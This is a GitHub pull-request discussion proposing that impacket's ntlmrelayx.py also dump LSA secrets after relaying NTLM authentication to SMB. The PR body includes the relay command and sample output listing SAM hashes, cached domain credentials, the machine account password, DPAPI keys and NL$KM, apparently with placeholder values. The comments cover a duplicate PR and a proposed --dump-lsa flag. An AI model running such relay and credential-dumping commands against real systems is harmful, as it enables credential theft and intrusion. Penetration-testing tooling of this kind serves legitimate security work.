feat: add support for LSA secrets extractions when performing relay to smb with ntlmrelayx.py #1873

Status: Open. Wants to merge 1 commit into base: master.
Conversation

hugo-syn (Contributor)
Add support for LSA secrets extractions when performing relay to smb with ntlmrelayx.py:

```
$ python3 ./examples/ntlmrelayx.py -t smb://13.37.13.37 -smb2support
[...]

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 127.0.0.1, attacking target smb://13.37.13.37
[*] Authenticating against smb://13.37.13.37 as DEV.LOCAL/ADMIN SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xaad3b435b51404eeaad3b435b51404ee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
[*] Done dumping SAM hashes for host: 13.37.13.37
[*] Dumping cached domain logon information (domain/username:hash)
DEV.LOCAL/user:$DCC2$10240#user#aad3b435b51404eeaad3b435b51404ee: (2025-01-14 12:47:42+00:00)
[*] Done dumping LSA Cached hashes for host: 13.37.13.37
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
DEV\COMPUTER01$:plain_password_hex:2200390021005d0070005a[...]
DEV\COMPUTER01$:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
[*] DefaultPassword
local_user:synacktiv
[*] DPAPI_SYSTEM
dpapi_machinekey:0xaad3b435b51404eeaad3b435b51404eeaaaaaaaa
dpapi_userkey:0xaad3b435b51404eeaad3b435b51404eeaaaaaaaa
[*] NL$KM
 0000   10 48 50 1F 4A 91 F6 6C  EC 3F FC BD FF CA 74 84   .HP.J..l.?....t.
[...]
NL$KM:aad3b435b51404eeaad3b435b51404ee[...]
[*] Done dumping LSA secrets for host: 13.37.13.37
[*] Stopping service RemoteRegistry
```

I can add a flag to toggle this feature on or off, but if someone is interested in dumping SAM hashes, they’d likely appreciate access to LSA secrets as well :)

@SAERXCIT (Contributor)

Hi!
Also in #1253 with the last comment from the impacket team being "we concluded it would be nice to have this functionality available through a new parameter ( like --dump-lsa ) and not as default" but inactive since then.

@hugo-syn (Contributor, Author)

Oh, thanks for showing me this PR @SAERXCIT. I don't know what to do; should I close this and bump the other PR?

@SAERXCIT (Contributor)

Well, if anything this shows that this feature is actually wanted. As an external observer I'd say that the original author opened the PR 3 years ago and didn't follow up on Fortra's request for modifications 1 year ago; on the other hand, you seem to be available right now to process any modification request. At least I would take into account Fortra's requirement to "have this functionality available through a new parameter ( like --dump-lsa ) and not as default", and hope your PR gets merged then.

@hugo-syn (Contributor, Author)

Well, I can add the --dump-lsa flag, but I don't want to steal the original author's work; moreover, I think that the PR you linked has additional features. Tell me what's better.
